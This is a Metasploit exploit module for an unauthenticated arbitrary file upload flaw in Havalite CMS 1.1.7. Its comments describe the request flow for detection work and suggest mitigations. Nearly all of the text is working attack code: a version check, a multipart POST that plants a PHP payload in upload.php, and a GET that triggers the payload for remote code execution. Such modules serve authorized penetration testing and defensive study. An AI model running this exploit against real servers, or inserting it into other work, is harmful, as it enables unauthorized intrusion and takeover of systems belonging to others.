##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for the unauthenticated file upload in Havalite CMS 1.1.7.
#
# Request flow (useful for detection engineering / IR): `check` issues a GET to
# `<TARGETURI>havalite/` and reads the version out of an inline `<script>` block;
# `exploit` then POSTs a multipart form with a `files[]` part carrying a randomly
# named `.php` file to `<TARGETURI>havalite/upload.php`, and finally GETs the
# uploaded file back from `<TARGETURI>havalite/tmp/files/<name>.php` to trigger it.
# Mitigation is on the application side: the upload endpoint must require
# authentication and reject executable file types / server-side execution of
# anything written under `havalite/tmp/files/`.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Module metadata and options.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info.
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Havalite CMS Arbitary File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and
        possibly prior. Attackers can abuse the upload feature in order to upload a
        malicious PHP file without authentication, which results in arbitrary remote code
        execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'CWH',
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '94405'],
          ['EDB', '26243']
        ],
      'Payload'        =>
        {
          # NUL is excluded because the payload is embedded in a PHP source file.
          'BadChars' => "\x00"
        },
      'Platform'       => %w{ linux php },
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-06-17',
      'DefaultTarget'  => 0))

    register_options(
      [
        # Base path of the Havalite install; 'havalite/' is appended by the module.
        OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])
      ])
  end

  #
  # Checks if target is running HavaLite CMS 1.1.7
  # We only flag 1.1.7 as vulnerable, because we don't have enough information from
  # the vendor or OSVDB about exactly which ones are really vulnerable.
  #
  # The version is taken from `var myVersion = '...'` inside the first inline
  # `<script type="text/javascript">` block of `<TARGETURI>havalite/`. A missing
  # script block or variable yields an empty string and therefore CheckCode::Safe,
  # so a hardened page that strips the version banner will read as Safe, not Unknown.
  #
  # @return [Exploit::CheckCode] Unknown on no response, Appears on 1.1.7, Safe otherwise.
  def check
    uri = normalize_uri(target_uri.path, 'havalite/')
    res = send_request_raw({'uri' => uri})

    if not res
      vprint_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    # Single-line (/m) match against the first inline script block; '' if absent.
    js_src = res.body.scan(/<script type="text\/javascript">(.+)<\/script>/im).flatten[0] || ''
    version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''

    if not version.empty? and version =~ /1\.1\.7/
      vprint_status("Version found: #{version}")
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end


  #
  # Uploads our malicious file
  #
  # Sends a multipart/form-data POST to `<base>havalite/upload.php` with one part
  # named `files[]` whose filename is five random letters plus `.php`. The PHP
  # stager comes from Msf::Exploit::PhpEXE#get_write_exec_payload with
  # `:unlink_self => true` (presumably so the dropped file removes itself after
  # running — confirm against the mixin).
  #
  # @param base [String] TARGETURI path
  # @return [String] the randomised filename that was uploaded
  # @raise via fail_with on timeout, 404 for upload.php, or an `"error":"abort"` JSON reply
  def upload(base)
    p = get_write_exec_payload(:unlink_self=>true)
    fname = "#{rand_text_alpha(5)}.php"

    data = Rex::MIME::Message.new
    data.add_part(p, "application/octet-stream", nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")
    post_data = data.to_s

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(base, 'havalite', 'upload.php'),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res
      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
    elsif res.code.to_i == 404
      fail_with(Failure::NotFound, "#{peer} - No upload.php found")
    elsif res.body =~ /"error"\:"abort"/
      fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
    end

    return fname
  end


  #
  # Executes our uploaded malicious file
  #
  # GETs `<base>havalite/tmp/files/<payload_fname>`. Only an explicit 404 is
  # treated as failure; a nil response (timeout) is deliberately not an error here,
  # since a payload that runs may never return a normal HTTP reply.
  #
  # @param base [String] TARGETURI path
  # @param payload_fname [String] filename returned by #upload
  # @return [nil]
  def exec(base, payload_fname)
    res = send_request_raw({
      'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)
    })

    if res and res.code == 404
      fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
    end
  end


  # Entry point: upload the PHP file, then request it to trigger execution.
  def exploit
    base = target_uri.path

    print_status("Uploading malicious file...")
    fname = upload(base)

    print_status("Executing #{fname}...")
    exec(base, fname)
  end
end